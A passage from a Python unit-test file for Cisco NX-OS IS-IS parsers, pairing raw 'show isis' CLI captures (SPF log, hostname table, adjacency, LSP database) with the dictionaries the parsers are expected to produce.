        self.device = Mock(**self.golden_output1)
        obj = ShowIsisInterface(device=self.device)
        parsed_output = obj.parse()
        self.assertEqual(parsed_output, self.golden_parsed_output1)
class TestShowIsisSpfLogDetail(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'topology': {
'0': {
'total_num_of_spf_calc': 362685,
'log_entry': {
'current': 20,
'max': 20,
},
'entrys': {
'01': {
'ago': '00:01:23',
'date': 'Tue Oct 22 18:33:26 2019',
'level': {
1: {
'instance': '0x0002C453',
'init': 0.000728,
'spf': 0.000813,
'is_update': 0.00016,
'urib_update': 0.00052,
'total': 0.002374,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
'02': {
'ago': '00:01:18',
'date': 'Tue Oct 22 18:33:31 2019',
'level': {
2: {
'instance': '0x0002C458',
'init': 0.000878,
'spf': 0.000771,
'is_update': 0.000127,
'urib_update': 0.000375,
'total': 0.002283,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
},
},
'2': {
'total_num_of_spf_calc': 362754,
'log_entry': {
'current': 4,
'max': 4,
},
'entrys': {
'01': {
'ago': '00:01:20',
'date': 'Tue Oct 22 18:33:29 2019',
'level': {
1: {
'instance': '0x0002C476',
'init': 0.000681,
'spf': 0.001235,
'is_update': 0.000155,
'urib_update': 0.000713,
'total': 0.002985,
'node': 4,
'count': 5,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
'02': {
'ago': '00:01:17',
'date': 'Tue Oct 22 18:33:32 2019',
'level': {
2: {
'instance': '0x0002C47A',
'init': 0.000891,
'spf': 0.00138,
'is_update': 0.000291,
'urib_update': 0.00053,
'total': 0.003275,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
'03': {
'ago': '00:01:12',
'date': 'Tue Oct 22 18:33:37 2019',
'level': {
1: {
'instance': '0x0002C477',
'init': 0.001086,
'spf': 0.000931,
'is_update': 0.0002,
'urib_update': 0.001112,
'total': 0.003581,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
'04': {
'ago': '00:01:09',
'date': 'Tue Oct 22 18:33:40 2019',
'level': {
2: {
'instance': '0x0002C47B',
'init': 0.001284,
'spf': 0.001047,
'is_update': 0.000209,
'urib_update': 0.000336,
'total': 0.003068,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
},
},
},
},
'VRF1': {
'topology': {
'0': {
'total_num_of_spf_calc': 361971,
'log_entry': {
'current': 3,
'max': 3,
},
'entrys': {
'01': {
'ago': '00:01:24',
'date': 'Tue Oct 22 18:33:25 2019',
'level': {
2: {
'instance': '0x0002C2F5',
'init': 0.000793,
'spf': 0.000268,
'is_update': 7.8e-05,
'urib_update': 0.000395,
'total': 0.001709,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'02': {
'ago': '00:01:19',
'date': 'Tue Oct 22 18:33:30 2019',
'level': {
1: {
'instance': '0x0002C2EC',
'init': 0.000547,
'spf': 0.000655,
'is_update': 9.9e-05,
'urib_update': 0.000507,
'total': 0.001968,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'03': {
'ago': '00:01:15',
'date': 'Tue Oct 22 18:33:34 2019',
'level': {
2: {
'instance': '0x0002C2F6',
'init': 0.000728,
'spf': 0.0002,
'is_update': 6.3e-05,
'urib_update': 0.000298,
'total': 0.001445,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
},
},
'2': {
'total_num_of_spf_calc': 362019,
'log_entry': {
'current': 3,
'max': 3,
},
'entrys': {
'01': {
'ago': '00:01:25',
'date': 'Tue Oct 22 18:33:24 2019',
'level': {
2: {
'instance': '0x0002C305',
'init': 0.000499,
'spf': 0.000217,
'is_update': 6.4e-05,
'urib_update': 0.000208,
'total': 0.001116,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'02': {
'ago': '00:01:21',
'date': 'Tue Oct 22 18:33:29 2019',
'level': {
1: {
'instance': '0x0002C30C',
'init': 0.001635,
'spf': 0.000398,
'is_update': 8.3e-05,
'urib_update': 0.000547,
'total': 0.002902,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'03': {
'ago': '00:01:16',
'date': 'Tue Oct 22 18:33:33 2019',
'level': {
2: {
'instance': '0x0002C306',
'init': 0.000615,
'spf': 0.000236,
'is_update': 6.4e-05,
'urib_update': 0.000219,
'total': 0.001268,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis spf-log detail vrf all
IS-IS Process: test SPF information VRF: default
SPF log for Topology 0
Total number of SPF calculations: 362685
Log entry (current/max): 20/20
Log entry: 01, Ago: 00:01:23, Date: Tue Oct 22 18:33:26 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C453 0.000728 0.000813 0.000160 0.000520 0.002374
Level Node Count Changed Reason
1 4 6 0 New adj R2_xr on Ethernet1/1.115
Log entry: 02, Ago: 00:01:18, Date: Tue Oct 22 18:33:31 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C458 0.000878 0.000771 0.000127 0.000375 0.002283
Level Node Count Changed Reason
2 4 6 0 New adj R1_xe on Ethernet1/2.115
SPF log for Topology 2
Total number of SPF calculations: 362754
Log entry (current/max): 4/4
Log entry: 01, Ago: 00:01:20, Date: Tue Oct 22 18:33:29 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C476 0.000681 0.001235 0.000155 0.000713 0.002985
Level Node Count Changed Reason
1 4 5 0 New adj R2_xr on Ethernet1/1.115
Log entry: 02, Ago: 00:01:17, Date: Tue Oct 22 18:33:32 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C47A 0.000891 0.001380 0.000291 0.000530 0.003275
Level Node Count Changed Reason
2 4 6 0 New adj R1_xe on Ethernet1/2.115
Log entry: 03, Ago: 00:01:12, Date: Tue Oct 22 18:33:37 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C477 0.001086 0.000931 0.000200 0.001112 0.003581
Level Node Count Changed Reason
1 4 6 0 New adj R1_xe on Ethernet1/2.115
Log entry: 04, Ago: 00:01:09, Date: Tue Oct 22 18:33:40 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C47B 0.001284 0.001047 0.000209 0.000336 0.003068
Level Node Count Changed Reason
2 4 6 0 New adj R2_xr on Ethernet1/1.115
IS-IS Process: test SPF information VRF: VRF1
SPF log for Topology 0
Total number of SPF calculations: 361971
Log entry (current/max): 3/3
Log entry: 01, Ago: 00:01:24, Date: Tue Oct 22 18:33:25 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C2F5 0.000793 0.000268 0.000078 0.000395 0.001709
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 02, Ago: 00:01:19, Date: Tue Oct 22 18:33:30 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C2EC 0.000547 0.000655 0.000099 0.000507 0.001968
Level Node Count Changed Reason
1 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 03, Ago: 00:01:15, Date: Tue Oct 22 18:33:34 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C2F6 0.000728 0.000200 0.000063 0.000298 0.001445
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
SPF log for Topology 2
Total number of SPF calculations: 362019
Log entry (current/max): 3/3
Log entry: 01, Ago: 00:01:25, Date: Tue Oct 22 18:33:24 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C305 0.000499 0.000217 0.000064 0.000208 0.001116
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 02, Ago: 00:01:21, Date: Tue Oct 22 18:33:29 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C30C 0.001635 0.000398 0.000083 0.000547 0.002902
Level Node Count Changed Reason
1 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 03, Ago: 00:01:16, Date: Tue Oct 22 18:33:33 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C306 0.000615 0.000236 0.000064 0.000219 0.001268
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisSpfLogDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
    """Golden device output must parse into the expected structure."""
    self.device = Mock(**self.golden_output)
    parser = ShowIsisSpfLogDetail(device=self.device)
    parsed_output = parser.parse(vrf='all')
    self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowIsisHostname(unittest.TestCase):
    """Unit tests for ShowIsisHostname ('show isis hostname vrf all' on NX-OS)."""

    device = Device(name='aDevice')
    empty_output = {'execute.return_value': ''}
    maxDiff = None

    # Structure the parser is expected to build from golden_output below.
    golden_parsed_output = {
        'instance': {
            'test': {
                'vrf': {
                    'VRF1': {
                        'hostname_db': {
                            'hostname': {
                                '3333.3333.3333': {
                                    'hostname': 'R3_nx',
                                    'level': [1],
                                    # '*' in the CLI output marks the local router
                                    'local_router': True,
                                },
                            },
                        },
                    },
                    'default': {
                        'hostname_db': {
                            'hostname': {
                                '1111.1111.1111': {
                                    'hostname': 'R1_ios',
                                    'level': [1],
                                },
                                '2222.2222.2222': {
                                    'hostname': 'R2_xr',
                                    'level': [1],
                                },
                                '3333.3333.3333': {
                                    'hostname': 'R3_nx',
                                    'level': [1],
                                    'local_router': True,
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    # Raw CLI capture fed to the parser (fixture); content preserved verbatim.
    golden_output = {'execute.return_value': '''\
R3_nx# show isis hostname vrf all
IS-IS Process: test dynamic hostname table VRF: default
Level System ID Dynamic hostname
1 1111.1111.1111 R1_ios
1 2222.2222.2222 R2_xr
1 3333.3333.3333* R3_nx
IS-IS Process: test dynamic hostname table VRF: VRF1
Level System ID Dynamic hostname
1 3333.3333.3333* R3_nx
'''}

    def test_empty(self):
        """Empty output must raise SchemaEmptyParserError."""
        self.device = Mock(**self.empty_output)
        parser = ShowIsisHostname(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parser.parse()

    def test_golden(self):
        """Golden output must parse into golden_parsed_output."""
        self.device = Mock(**self.golden_output)
        parser = ShowIsisHostname(device=self.device)
        parsed_output = parser.parse(vrf='all')
        self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowIsisHostnameDetail(unittest.TestCase):
    """Unit tests for ShowIsisHostnameDetail ('show isis hostname detail vrf all')."""

    device = Device(name='aDevice')
    empty_output = {'execute.return_value': ''}
    maxDiff = None

    # Expected parse result; an LSP ID seen at both levels collapses into one
    # entry whose 'level' list carries every level it appeared at.
    golden_parsed_output = {
        'instance': {
            'test': {
                'vrf': {
                    'VRF1': {
                        'hostname_db': {
                            'hostname': {
                                '1111.1111.1111': {
                                    'hostname': 'R1_ios',
                                    'level': [1],
                                },
                                '2222.2222.2222.00-00': {
                                    'hostname': 'R2',
                                    'level': [2],
                                },
                                '3333.3333.3333': {
                                    'hostname': 'R3_nx',
                                    'level': [1],
                                    'local_router': True,
                                },
                                '7777.7777.7777.00-00': {
                                    'hostname': 'R7',
                                    'level': [1, 2],
                                    'local_router': True,
                                },
                            },
                        },
                    },
                    'default': {
                        'hostname_db': {
                            'hostname': {
                                '2222.2222.2222.00-00': {
                                    'hostname': 'R2',
                                    'level': [2],
                                },
                                '3333.3333.3333.00-00': {
                                    'hostname': 'R3',
                                    'level': [1, 2],
                                },
                                '4444.4444.4444.00-00': {
                                    'hostname': 'R4',
                                    'level': [1],
                                },
                                '5555.5555.5555.00-00': {
                                    'hostname': 'R5',
                                    'level': [1, 2],
                                },
                                '6666.6666.6666.00-00': {
                                    'hostname': 'R6',
                                    'level': [1],
                                },
                                '7777.7777.7777.00-00': {
                                    'hostname': 'R7',
                                    'level': [1, 2],
                                    'local_router': True,
                                },
                                '8888.8888.8888.00-00': {
                                    'hostname': 'R8',
                                    'level': [2],
                                },
                                '9999.9999.9999.00-00': {
                                    'hostname': 'R9',
                                    'level': [2],
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    # Raw CLI capture fed to the parser (fixture); content preserved verbatim.
    golden_output = {'execute.return_value': '''\
IS-IS Process: test dynamic hostname table VRF: default
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 3333.3333.3333.00-00 R3
2 3333.3333.3333.00-00 R3
1 4444.4444.4444.00-00 R4
1 5555.5555.5555.00-00 R5
2 5555.5555.5555.00-00 R5
1 6666.6666.6666.00-00 R6
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
2 8888.8888.8888.00-00 R8
2 9999.9999.9999.00-00 R9
IS-IS Process: test dynamic hostname table VRF: VRF1
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
1 1111.1111.1111 R1_ios
1 3333.3333.3333* R3_nx
'''}

    def test_empty(self):
        """Empty output must raise SchemaEmptyParserError."""
        self.device = Mock(**self.empty_output)
        parser = ShowIsisHostnameDetail(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parser.parse()

    def test_golden(self):
        """Golden output must parse into golden_parsed_output."""
        self.device = Mock(**self.golden_output)
        parser = ShowIsisHostnameDetail(device=self.device)
        parsed_output = parser.parse(vrf='all')
        self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowIsisAdjacency(unittest.TestCase):
    """Unit tests for ShowIsisAdjacency ('show isis adjacency vrf all')."""

    device = Device(name='aDevice')
    empty_output = {'execute.return_value': ''}
    maxDiff = None

    # Expected parse result keyed instance -> vrf -> interface -> adjacency
    # -> SNPA -> IS-IS level, one entry per (neighbor, level) row of the CLI.
    golden_parsed_output = {
        'instance': {
            'test': {
                'vrf': {
                    'default': {
                        'interfaces': {
                            'Ethernet1/1.115': {
                                'adjacencies': {
                                    'R2_xr': {
                                        'neighbor_snpa': {
                                            'fa16.3e44.0679': {
                                                'level': {
                                                    1: {
                                                        'hold_time': '00:00:09',
                                                        'state': 'UP',
                                                    },
                                                    2: {
                                                        'hold_time': '00:00:07',
                                                        'state': 'UP',
                                                    },
                                                },
                                            },
                                        },
                                    },
                                },
                            },
                            'Ethernet1/2.115': {
                                'adjacencies': {
                                    'R1_ios': {
                                        'neighbor_snpa': {
                                            'fa16.3e0e.fd03': {
                                                'level': {
                                                    1: {
                                                        'hold_time': '00:00:07',
                                                        'state': 'UP',
                                                    },
                                                    2: {
                                                        'hold_time': '00:00:10',
                                                        'state': 'UP',
                                                    },
                                                },
                                            },
                                        },
                                    },
                                },
                            },
                        },
                    },
                    'VRF1': {
                        'interfaces': {
                            'Ethernet1/1.415': {
                                'adjacencies': {
                                    '2222.2222.2222': {
                                        'neighbor_snpa': {
                                            'fa16.3e44.0679': {
                                                'level': {
                                                    1: {
                                                        'hold_time': '00:00:32',
                                                        'state': 'INIT',
                                                    },
                                                    2: {
                                                        'hold_time': '00:00:24',
                                                        'state': 'INIT',
                                                    },
                                                },
                                            },
                                        },
                                    },
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    # Raw CLI capture fed to the parser (fixture); content preserved verbatim.
    golden_output = {'execute.return_value': '''\
R3_nx# show isis adjacency vrf all
IS-IS process: test VRF: default
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R2_xr fa16.3e44.0679 1 UP 00:00:09 Ethernet1/1.115
R2_xr fa16.3e44.0679 2 UP 00:00:07 Ethernet1/1.115
R1_ios fa16.3e0e.fd03 1 UP 00:00:07 Ethernet1/2.115
R1_ios fa16.3e0e.fd03 2 UP 00:00:10 Ethernet1/2.115
IS-IS process: test VRF: VRF1
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
2222.2222.2222 fa16.3e44.0679 1 INIT 00:00:32 Ethernet1/1.415
2222.2222.2222 fa16.3e44.0679 2 INIT 00:00:24 Ethernet1/1.415
'''}

    def test_empty(self):
        """Empty output must raise SchemaEmptyParserError."""
        self.device = Mock(**self.empty_output)
        parser = ShowIsisAdjacency(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parser.parse()

    def test_golden(self):
        """Golden output must parse into golden_parsed_output."""
        self.device = Mock(**self.golden_output)
        parser = ShowIsisAdjacency(device=self.device)
        parsed_output = parser.parse(vrf='all')
        self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowIsisDatabaseDetail(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'level_db': {
1: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CD',
'checksum': '0xAD22',
'lifetime': 1199,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C9',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.01-00': {
'lsp_id': 'R1_xe.01-00',
'sequence': '0x000007C7',
'checksum': '0x14CA',
'lifetime': 846,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C7',
'checksum': '0x0D6A',
'lifetime': 852,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R2_xr.00-00': {
'lsp_id': 'R2_xr.00-00',
'sequence': '0x000007C5',
'checksum': '0x94D6',
'lifetime': 887,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007BD',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'ip_address': '10.16.2.2',
'extended_ip': {
'10.16.2.2/32': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'hostname': 'R2_xr',
'length': 5,
'ipv6_address': '2001:2:2:2::2',
'mt_ipv6_prefix': {
'2001:2:2:2::2/128': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'extended_is_neighbor': {
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
},
},
'mt_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
'topo_id': 2,
},
},
'digest_offset': 0,
},
'R2_xr.03-00': {
'lsp_id': 'R2_xr.03-00',
'sequence': '0x000007C6',
'checksum': '0x86AC',
'lifetime': 594,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C5',
'extended_is_neighbor': {
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B05',
'checksum': '0x7FA7',
'lifetime': 653,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B05',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 40,
},
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
2: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007C9',
'checksum': '0xBB89',
'lifetime': 1087,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C4',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 20,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 20,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.01-00': {
'lsp_id': 'R1_xe.01-00',
'sequence': '0x000007C0',
'checksum': '0x3A34',
'lifetime': 1137,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007BF',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C8',
'checksum': '0x23DB',
'lifetime': 867,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C7',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R2_xr.00-00': {
'lsp_id': 'R2_xr.00-00',
'sequence': '0x000007D1',
'checksum': '0xE002',
'lifetime': 813,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C9',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'ip_address': '10.16.2.2',
'extended_ip': {
'10.16.2.2/32': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.36.3.3/32': {
'metric': 11,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 20,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'hostname': 'R2_xr',
'length': 5,
'ipv6_address': '2001:2:2:2::2',
'mt_ipv6_prefix': {
'2001:2:2:2::2/128': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:3:3:3::3/128': {
'metric': 11,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 20,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'digest_offset': 0,
},
'R2_xr.03-00': {
'lsp_id': 'R2_xr.03-00',
'sequence': '0x000007C2',
'checksum': '0x8EA8',
'lifetime': 784,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C1',
'extended_is_neighbor': {
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B05',
'checksum': '0x7FA7',
'lifetime': 1040,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B05',
'area_address': '49.0001',
